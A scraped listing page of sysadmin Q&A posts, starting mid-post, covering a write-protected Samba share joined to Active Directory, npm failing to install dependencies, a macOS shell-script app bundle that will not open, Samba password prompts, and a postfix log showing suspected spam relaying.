/mnt/sdc1/ root@lx:/etc/pam.d# ls -ld /mnt/sdc1/export/ drwxrwxrwx+ 5 administrator domänen-admins 4096 2010-12-03 19:04 /mnt/sdc1/export/ root@lx:/etc/pam.d# getfacl /mnt/ getfacl: Entferne führende '/' von absoluten Pfadnamen # file: mnt/ # owner: root # group: root user::rwx group::r-x other::r-x root@lx:/etc/pam.d# getfacl /mnt/sdc1/ getfacl: Entferne führende '/' von absoluten Pfadnamen # file: mnt/sdc1/ # owner: froh # group: froh user::rwx group::r-x other::r-x root@lx:/etc/pam.d# getfacl /mnt/sdc1/export/ getfacl: Entferne führende '/' von absoluten Pfadnamen # file: mnt/sdc1/export/ # owner: administrator # group: domänen-admins user::rwx group::rwx group:domänen-admins:rwx mask::rwx other::rwx default:user::rwx default:group::rwx default:group:domänen-admins:rwx default:mask::rwx default:other::rwx My, oh my what am I overlooking? What am I to blind to see?

    Read the article

  • NPM not installing dependencies?

    - by neezer
    Having trouble getting NPM to install dependencies with npm install -d in my project directory with a defined package.json file. Here's my package.json: https://gist.github.com/3068312 And after wiping my project root's node modules folder (rm -rf node_modules), I run npm install -d in my project root and am greeted with this: (ssh) /vagrant git:master ? npm install -d npm info it worked if it ends with ok npm info using [email protected] npm info using [email protected] npm info preinstall [email protected] npm http GET https://registry.npmjs.org/sinon npm http GET https://registry.npmjs.org/underscore npm http GET https://registry.npmjs.org/mocha npm http GET https://registry.npmjs.org/request npm http 304 https://registry.npmjs.org/sinon npm http 304 https://registry.npmjs.org/underscore npm http 304 https://registry.npmjs.org/mocha npm http 304 https://registry.npmjs.org/request npm info into /vagrant [email protected] npm info into /vagrant [email protected] npm info into /vagrant [email protected] npm info into /vagrant [email protected] npm info installOne [email protected] npm info installOne [email protected] npm info installOne [email protected] npm info installOne [email protected] npm info unbuild /vagrant/node_modules/underscore npm info unbuild /vagrant/node_modules/mocha npm info unbuild /vagrant/node_modules/sinon npm info unbuild /vagrant/node_modules/request npm ERR! error installing [email protected] npm info unbuild /vagrant/node_modules/underscore npm ERR! error rolling back [email protected] Error: UNKNOWN, unknown error '/vagrant/node_modules/underscore' npm ERR! Error: ENOENT, no such file or directory '/vagrant/node_modules/underscore/package.json' npm ERR! You may report this log at: npm ERR! <http://bugs.debian.org/npm> npm ERR! or use npm ERR! reportbug --attach /vagrant/npm-debug.log npm npm ERR! npm ERR! System Linux 3.2.0-23-generic npm ERR! command "node" "/usr/bin/npm" "install" "-d" npm ERR! cwd /vagrant npm ERR! node -v v0.6.12 npm ERR! npm -v 1.1.4 npm ERR! path /vagrant/node_modules/underscore/package.json npm ERR! code ENOENT npm ERR! message ENOENT, no such file or directory '/vagrant/node_modules/underscore/package.json' npm ERR! errno {} npm ERR! error installing [email protected] npm info unbuild /vagrant/node_modules/request npm ERR! error rolling back [email protected] Error: UNKNOWN, unknown error '/vagrant/node_modules/request' npm ERR! npm ERR! Additional logging details can be found in: npm ERR! /vagrant/npm-debug.log npm not ok If I rerun npm install -d, the error changes to whatever the next package is... if I keep running it it over and over again, it eventually doesn't complain anymore and outputs: (ssh) /vagrant git:master ? npm install -d npm info it worked if it ends with ok npm info using [email protected] npm info using [email protected] npm info preinstall [email protected] npm info build /vagrant npm info linkStuff [email protected] npm info install [email protected] npm info postinstall [email protected] npm info ok However, none of the dependencies for any of these packages get installed. For instance, cheerio has a few dependencies, so when I try running my test suite, I'm greeted with: (ssh) /vagrant git:master ? mocha --compilers coffee:coffee-script --watch spec/* node.js:201 throw e; // process.nextTick error, or 'error' event on first tick ^ Error: Cannot find module 'cheerio-select' at Function._resolveFilename (module.js:332:11) at Function._load (module.js:279:25) at Module.require (module.js:354:17) What gives? I'm on Ubuntu Precise64 in a Vagrant virtual box.

    Read the article

  • Cannot open simplest mac application

    - by streetpc
    I created a very simple app, which is only a wrapper of a shell script (so that I can select this script in application selectors, like startup apps). I try to launch it and yesterday it worked, but today I changed the executable script's content and name (with something that perfeclty works in a shell script launched in the Terminal) and it will only display a Finder-iconed dialog saying Cannot open the application because it is not supported on this kind of Mac. I restored the previous script (content/name) but I still get the error! Same when re-bundling the app from scratch, or completely changing the bundle identifier… If I try to open it in the Terminal using open My.app, I get The application cannot be opened because it has an incorrect executable format. But when I executes directly the Contents/MacOS/Script, it allways works (iwth both contents). Also, it is displayed with correct icon and meta-information in the Finder (so I guess the Info.plist is understood). The app's file tree is: Contents/ Info.plist MacOS/ Script (executable bit set, works when launched directly) PkgInfo Resources/ AppIcon.icns Here is the Info.plist content: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>CFBundleExecutable</key> <string>Script</string> <key>CFBundleIconFile</key> <string>AppIcon</string> <key>CFBundleIdentifier</key> <string>asdf.ScriptApp</string> <key>CFBundleInfoDictionaryVersion</key> <string>6.0</string> <key>CFBundleName</key> <string>My script</string> <key>CFBundlePackageType</key> <string>APPL</string> <key>CFBundleShortVersionString</key> <string>1.0</string> <key>CFBundleSignature</key> <string>????</string> <key>CFBundleVersion</key> <string>1</string> <key>LSMinimumSystemVersion</key> <string>10.4</string> </dict> </plist> And the PkgInfo file only contains APPL????. I tested the Script with a simple echo "ok" and echo "ok" >/tmp/test (plus #!/bin/sh header). So my questions are: * Is there some kind of validity caching for applications ? based on what ? how do I flush it ? * Where does this message come from ? I tried to google it but all I get is a page talking about 32/64 bits Java…

    Read the article

  • Samba with Active Directory - shares are readonly, NT_STATUS_MEDIA_WRITE_PROTECTED

    - by froh42
    I've set a samba server that seems to work, all shares are seemingly exported as readonly, however. The machine is called "lx". When I'm on lx I can run the following command: froh@lx:~$ smbclient //lx/export -UAdministrator Enter Administrator's password: Domain=[CUSTOMER] OS=[Unix] Server=[Samba 3.5.4] smb: \> mkdir wrzlbrmpf NT_STATUS_MEDIA_WRITE_PROTECTED making remote directory \wrzlbrmpf smb: \> ls . D 0 Fri Dec 3 19:04:20 2010 .. D 0 Sun Nov 28 01:32:37 2010 zork D 0 Fri Dec 3 18:53:33 2010 bar D 0 Sun Nov 28 23:52:43 2010 ork 1 Fri Dec 3 18:53:02 2010 foo 1 Sun Nov 28 23:52:41 2010 gaga D 0 Fri Dec 3 19:04:20 2010 How can I troubleshoot this? What I did: First I set up a fresh install of Ubuntu 10.10 x64. Second I got kerberos working with the following krb5.conf file: [libdefaults] ticket_lifetime = 24000 clock_skew = 300 default_realm = CUSTOMER.LOCAL [realms] CUSTOMER.LOCAL = { kdc = SB4.customer.local:88 admin_server = SB4.customer.local:464 default_domain = CUSTOMER.LOCAL } [domain_realm] .customer.local = CUSTOMER.LOCAL customer.local = CUSTOMER.LOCAL #[login] # krb4_convert = true # krb4_get_tickets = false I also added winbind to group, passwd and shadow in nsswitch.conf. Seemingly Kerberos works: root@lx:~# net ads testjoin Join is OK root@lx:~# wbinfo -a 'Administrator%MYSECRETPASSWORD' plaintext password authentication succeeded challenge/response password authentication succeeded wbinfo -u and wbinfo -g also spit out a list of users and a list of groups respectiveley. I noted that domain accounts did NOT include a domain and they are in german (as on the SBS 2003 that is the domain server). So I get a "Domänenbenutzer" in wbinfo -u's output not a "CUSTOMER+Domain User" or something similar. I'm not sure anymore what I did to the PAM configuration, but here is what I currently have: root@lx:/etc/pam.d# cat samba @include common-auth @include common-account @include common-session-noninteractive root@lx:/etc/pam.d# grep -ve '^#' common-auth auth [success=3 default=ignore] pam_krb5.so minimum_uid=1000 auth [success=2 default=ignore] pam_unix.so nullok_secure try_first_pass auth [success=1 default=ignore] pam_winbind.so krb5_auth krb5_ccache_type=FILE cached_login try_first_pass auth requisite pam_deny.so auth required pam_permit.so root@lx:/etc/pam.d# grep -ve '^#' common-account account [success=2 new_authtok_reqd=done default=ignore] pam_unix.so account [success=1 new_authtok_reqd=done default=ignore] pam_winbind.so account requisite pam_deny.so account required pam_permit.so account required pam_krb5.so minimum_uid=1000 root@lx:/etc/pam.d# grep -ve '^#' common-session-noninteractive session [default=1] pam_permit.so session requisite pam_deny.so session required pam_permit.so session optional pam_krb5.so minimum_uid=1000 session required pam_unix.so session optional pam_winbind.so At some point I joined the linux box into the AD domain. After (manually) creating a home directory on the linux box I can log in using the Adminstrator user with the password taken from AD. Now I run samba with the following setup: [global] netbios name = LX realm = CUSTOMER.LOCAL workgroup = CUSTOMER security = ADS encrypt passwords = yes password server = 192.168.20.244 #IP des Domain Controllers os level = 0 socket options = TCP_NODELAY SO_RCVBUF=16384 SO_SNDBUF=16384 idmap uid = 10000-20000 idmap gid = 10000-20000 winbind enum users = Yes winbind enum groups = Yes preferred master = no winbind separator = + dns proxy = no wins proxy = no # client NTLMv2 auth = Yes log level = 2 logfile = /var/log/samba/log.smbd.%U template homedir = /home/%U template shell = /bin/bash [export] path = /mnt/sdc1/export read only = No public = Yes Currently I don't care whether export is exported to everyone or just one user, I want to see somebody WRITING to that directory before I start fiddling with the authentication settings. (Who may access it). As mentioned, accessing the share from smbclient results in this NT_STATUS_MEDIA_WRITE_PROTECTED . Accessing it from windows shows ACLs that look correct (The user may write) - but it does not work, I can only read files not write. The directory to be exported looks like this: root@lx:/etc/pam.d# ls -ld /mnt/ drwxr-xr-x 5 root root 4096 2010-11-28 01:29 /mnt/ root@lx:/etc/pam.d# ls -ld /mnt/sdc1/ drwxr-xr-x 4 froh froh 4096 2010-11-28 01:32 /mnt/sdc1/ root@lx:/etc/pam.d# ls -ld /mnt/sdc1/export/ drwxrwxrwx+ 5 administrator domänen-admins 4096 2010-12-03 19:04 /mnt/sdc1/export/ root@lx:/etc/pam.d# getfacl /mnt/ getfacl: Entferne führende '/' von absoluten Pfadnamen # file: mnt/ # owner: root # group: root user::rwx group::r-x other::r-x root@lx:/etc/pam.d# getfacl /mnt/sdc1/ getfacl: Entferne führende '/' von absoluten Pfadnamen # file: mnt/sdc1/ # owner: froh # group: froh user::rwx group::r-x other::r-x root@lx:/etc/pam.d# getfacl /mnt/sdc1/export/ getfacl: Entferne führende '/' von absoluten Pfadnamen # file: mnt/sdc1/export/ # owner: administrator # group: domänen-admins user::rwx group::rwx group:domänen-admins:rwx mask::rwx other::rwx default:user::rwx default:group::rwx default:group:domänen-admins:rwx default:mask::rwx default:other::rwx My, oh my what am I overlooking? What am I to blind to see?

    Read the article

  • Samba doesnt require password on xbmc but does on ubuntu

    - by Chris
    I have samba setup on a fedora 13 machine, and I use it to share with my xbmc client in the family room. When I set this up there no password or anything was required I merely entered in paths such as: smb://<host>/<share> and all worked. Now on my ubuntu 10.04 machine when I try to access the same hosts, for example through smbmount though I receive an error. smbmount //media/Music ~/Music/ # media is in my /etc/hosts and resolves to # correct IP address for the machine I receive error: operation not permitted after pressing enter when it prompts for password. Here is my entry from /etc/samba/smb.conf: [global] workgroup = WORKGROUP server string = Samba Server Version %v # log files split per-machine: log file = /var/log/samba/log.%m # maximum size of 50KB per log file, then rotate: max log size = 50 security = user passdb backend = tdbsam ; security = domain ; passdb backend = tdbsam ; realm = MY_REALM ; password server = <NT-Server-Name> ; security = user ; passdb backend = tdbsam ; domain master = yes ; domain logons = yes ; logon script = %m.bat ; logon script = %u.bat ; logon path = \\%L\Profiles\%u ; logon path = ; add user script = /usr/sbin/useradd "%u" -n -g users ; add group script = /usr/sbin/groupadd "%g" ; add machine script = /usr/sbin/useradd -n -c "Workstation (%u)" -M -d /nohome -s /bin/false "%u" ; delete user script = /usr/sbin/userdel "%u" ; delete user from group script = /usr/sbin/userdel "%u" "%g" ; delete group script = /usr/sbin/groupdel "%g" ; local master = no ; os level = 33 ; preferred master = yes ; wins support = yes ; wins server = w.x.y.z ; wins proxy = yes ; dns proxy = yes load printers = yes cups options = raw ; printcap name = /etc/printcap # obtain a list of printers automatically on UNIX System V systems: ; printcap name = lpstat ; printing = cups ; map archive = no ; map hidden = no ; map read only = no ; map system = no ; store dos attributes = yes #============================ Share Definitions ============================== [homes] comment = Home Directories browseable = no writable = yes ; valid users = %S ; valid users = MYDOMAIN\%S # Un-comment the following and create the netlogon directory for Domain Logons: ; [netlogon] ; comment = Network Logon Service ; path = /var/lib/samba/netlogon ; guest ok = yes ; writable = no ; share modes = no # Un-comment the following to provide a specific roving profile share. # The default is to use the user's home directory: ; [Profiles] ; path = /var/lib/samba/profiles ; browseable = no ; guest ok = yes # A publicly accessible directory that is read only, except for users in the # "staff" group (which have write permissions): ; [public] ; comment = Public Stuff ; path = /home/samba ; public = yes ; writable = yes ; printable = no ; write list = +staff [tv] comment = TV path = /media/Isos/tv public = yes writable = yes printable = no write list = +media [music] comment = Music path = /media/Storage/music/ public = yes writable = yes printable = no write list = +media [pictures] comment = Pictures path = /media/Storage/pictures public = yes writable = yes printable = no write list = +media

    Read the article

  • My smtp server is spammed?

    - by Milos
    I have a server and the postfix client on it. Since several days, I noticed a lot of processes running there. When checked, there are a lot of emails sent. Here is an example from the mail log: Aug 18 11:54:56 mem postfix/smtpd[9963]: connect from dslb-188-096-082-167.188.096.pools.vodafone-ip.de[188.96.82.167] Aug 18 11:54:56 mem postfix/smtpd[9301]: connect from unknown[186.113.45.4] Aug 18 11:54:56 mem postfix/smtpd[9963]: 525E7114012D: client=dslb-188-096-082-167.188.096.pools.vodafone-ip.de[188.96.82.167] Aug 18 11:54:56 mem postfix/cleanup[9970]: 525E7114012D: message-id=<B55835C9027BFA9D16CCBB556DB2F48BB82DF004000480BA-db0c3ce8aa74446411898d0d2feb3001@email.filmforthoughtinc.com> Aug 18 11:54:56 mem postfix/qmgr[2581]: 525E7114012D: from=<[email protected]>, size=10702, nrcpt=1 (queue active) Aug 18 11:54:56 mem postfix/smtpd[9301]: EC52711401DC: client=unknown[186.113.45.4] Aug 18 11:54:57 mem postfix/smtpd[9963]: disconnect from dslb-188-096-082-167.188.096.pools.vodafone-ip.de[188.96.82.167] Aug 18 11:54:57 mem postfix/cleanup[8597]: EC52711401DC: message-id=<4C905D97606B436FE50C6F738DE014D9D84F2185BA815D81-1a4dbe6fc2bfcc8183f5faf901cfa15e@email.manguerasespecializadas.com> Aug 18 11:54:57 mem postfix/smtp[9971]: 525E7114012D: to=<[email protected]>, relay=mail.mdpi.com[209.237.236.228]:25, delay=1.2, delays=0.55/0/0.45/0.16, dsn=5.1.1, status=bounced (host mail.mdpi.com[209.237.236.228] said: 550 5.1.1 <[email protected]>: Recipient address rejected: mdpi.com (in reply to RCPT TO command)) Aug 18 11:54:57 mem postfix/cleanup[10067]: 8B1E11140268: message-id=<[email protected]> Aug 18 11:54:57 mem postfix/bounce[10001]: 525E7114012D: sender non-delivery notification: 8B1E11140268 Aug 18 11:54:57 mem postfix/qmgr[2581]: 8B1E11140268: from=<>, size=12693, nrcpt=1 (queue active) Aug 18 11:54:57 mem postfix/qmgr[2581]: 525E7114012D: removed Aug 18 11:54:57 mem postfix/qmgr[2581]: EC52711401DC: from=<[email protected]>, size=10978, nrcpt=1 (queue active) Aug 18 11:54:57 mem postfix/smtp[10013]: connect to aspmx.l.google.com[2607:f8b0:400d:c03::1b]:25: Network is unreachable Aug 18 11:54:57 mem postfix/smtpd[9301]: disconnect from unknown[186.113.45.4] Aug 18 11:54:58 mem postfix/smtp[10013]: 8B1E11140268: to=<[email protected]>, relay=aspmx.l.google.com[74.125.22.26]:25, delay=0.5, delays=0.06/0/0.28/0.16, dsn=5.1.1, status=bounced (host aspmx.l.google.com[74.125.22.26] said: 550-5.1.1 The email account that you tried to reach does not exist. Please try 550-5.1.1 double-checking the recipient's email address for typos or 550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 http://support.google.com/mail/bin/answer.py?answer=6596 l7si24621420qad.26 - gsmtp (in reply to RCPT TO command)) Aug 18 11:54:58 mem postfix/qmgr[2581]: 8B1E11140268: removed Aug 18 11:54:58 mem postfix/smtp[9971]: EC52711401DC: to=<[email protected]>, relay=mail.mdpi.com[209.237.236.228]:25, delay=1.2, delays=0.66/0/0.44/0.12, dsn=5.1.1, status=bounced (host mail.mdpi.com[209.237.236.228] said: 550 5.1.1 <[email protected]>: Recipient address rejected: mdpi.com (in reply to RCPT TO command)) Aug 18 11:54:58 mem postfix/cleanup[9970]: 414361140254: message-id=<[email protected]> Aug 18 11:54:58 mem postfix/bounce[10001]: EC52711401DC: sender non-delivery notification: 414361140254 Aug 18 11:54:58 mem postfix/qmgr[2581]: 414361140254: from=<>, size=13057, nrcpt=1 (queue active) Aug 18 11:54:58 mem postfix/qmgr[2581]: EC52711401DC: removed Aug 18 11:55:01 mem postfix/smtp[10002]: 414361140254: to=<[email protected]>, relay=manguerasespecializadas.com[99.198.96.210]:25, delay=2.9, delays=0.04/0/2.1/0.84, dsn=2.0.0, status=sent (250 OK id=1XJPGs-0007BE-OI) Aug 18 11:55:01 mem postfix/qmgr[2581]: 414361140254: removed IS my server attacked, spammed? How to check that? Thank you.

    Read the article

< Previous Page | 319 320 321 322 323 324 325 326 327 328 329 330  | Next Page >